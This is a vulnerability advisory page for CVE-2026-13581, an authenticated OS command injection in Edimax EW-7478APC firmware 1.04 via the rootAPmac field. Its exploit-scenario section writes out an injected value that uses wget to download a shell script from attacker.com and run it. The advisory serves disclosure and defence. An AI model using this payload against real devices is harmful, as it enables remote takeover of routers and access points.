Skip to main content

Edimax EW-7478APC CVE-2026-13581

| EUVDEUVD-2026-40125 LOW
OS Command Injection (CWE-78)
2026-06-29 VulDB GHSA-pfpf-9r26-33qm
2.1
CVSS 4.0 · Vendor: VulDB

Severity by source

Vendor (VulDB) PRIMARY
2.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
9.9 CRITICAL

Network-reachable OS command injection with low-priv auth breaks out to OS scope, justifying S:C and C:H/I:H/A:H regardless of provided Low-impact scoring.

3.1 AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (VulDB).

CVSS VectorVendor: VulDB

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
X

Lifecycle Timeline

3
Analysis Generated
Jun 29, 2026 - 16:31 vuln.today
Severity Changed
Jun 29, 2026 - 16:22 NVD
MEDIUM LOW
CVSS changed
Jun 29, 2026 - 16:22 NVD
5.3 (MEDIUM) 2.1 (LOW)

DescriptionCVE.org

A vulnerability was detected in Edimax EW-7478APC 1.04. This vulnerability affects the function formStaDrvSetup of the file /goform/formStaDrvSetup of the component POST Request Handler. The manipulation of the argument rootAPmac results in os command injection. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

AnalysisAI

OS command injection in the Edimax EW-7478APC wireless access point firmware 1.04 allows a network-reachable authenticated attacker to execute arbitrary OS commands on the device by manipulating the rootAPmac parameter in POST requests to /goform/formStaDrvSetup. A public proof-of-concept exploit is available, indexed by VulDB and documented externally, and the vendor did not respond to responsible disclosure - making a vendor-released patch unlikely in the near term. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Identify EW-7478APC web interface on network
Delivery
Authenticate with low-privilege credentials
Exploit
Craft POST request to /goform/formStaDrvSetup
Execution
Inject OS commands via rootAPmac parameter
Impact
Execute arbitrary commands at firmware OS level

Vulnerability AssessmentAI

Exploitation Exploitation requires network access to the Edimax EW-7478APC web management interface and a valid authenticated session at low privilege level, as confirmed by PR:L in the provided CVSS 4.0 vector. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Real-world risk is substantially higher than the CVSS 4.0 score of 2.1 suggests. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with low-privilege credentials to the Edimax EW-7478APC web interface sends a crafted HTTP POST request to `/goform/formStaDrvSetup` with a `rootAPmac` value containing injected shell commands, such as `AA:BB:CC:DD:EE:FF; wget http://attacker.com/shell.sh -O /tmp/s && sh /tmp/s`. The firmware's `formStaDrvSetup` handler passes this value unsanitized to a system shell call, executing the injected commands with the web server's process privileges - typically root on embedded Linux devices. …
Remediation No vendor-released patch is available at time of analysis; the vendor did not respond to responsible disclosure, and no fix version has been identified. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-13581 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy